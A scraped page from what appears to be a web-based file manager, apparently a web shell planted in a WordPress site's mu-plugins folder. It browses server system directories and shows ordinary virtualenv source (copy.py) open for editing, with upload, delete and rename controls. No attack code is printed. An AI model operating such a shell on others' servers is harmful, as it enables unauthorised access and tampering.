📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
lib
›
python3.9
›
site-packages
›
virtualenv
›
seed
›
embed
›
via_app_data
›
📁 pip_install
📍
Lokasi:
/usr/lib/python3.9/site-packages/virtualenv/seed/embed/via_app_data/pip_install
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: copy.py
import os from pathlib import Path from virtualenv.util.path import copy from .base import PipInstall class CopyPipInstall(PipInstall): def _sync(self, src, dst): copy(src, dst) def _generate_new_files(self): # create the pyc files new_files = super()._generate_new_files() new_files.update(self._cache_files()) return new_files def _cache_files(self): version = self._creator.interpreter.version_info py_c_ext = f".{self._creator.interpreter.implementation.lower()}-{version.major}{version.minor}.pyc" for root, dirs, files in os.walk(str(self._image_dir), topdown=True): root_path = Path(root) for name in files: if name.endswith(".py"): yield root_path / f"{name[:-3]}{py_c_ext}" for name in dirs: yield root_path / name / "__pycache__" def _fix_records(self, new_files): extra_record_data_str = self._records_text(new_files) with (self._dist_info / "RECORD").open("ab") as file_handler: file_handler.write(extra_record_data_str.encode("utf-8")) __all__ = [ "CopyPipInstall", ]
💾 Simpan Perubahan
❌ Batal
📤 Upload
📁 Buat Folder
Nama
Ukuran
Dimodifikasi
Permission
Aksi
📁 __pycache__
-
2026-03-25 21:14
0755
✍️
🗑️
💻
__init__.py
0 B
2025-12-11 11:06
0644
✏️ Edit
⬇
✍️
🗑️
💻
base.py
8 KB
2025-12-11 11:06
0644
✏️ Edit
⬇
✍️
🗑️
💻
copy.py
1.2 KB
2025-12-11 11:06
0644
✏️ Edit
⬇
✍️
🗑️
💻
symlink.py
2 KB
2025-12-11 11:06
0644
✏️ Edit
⬇
✍️
🗑️
✍️ Rename:
Nama Baru:
Batal
💾 Simpan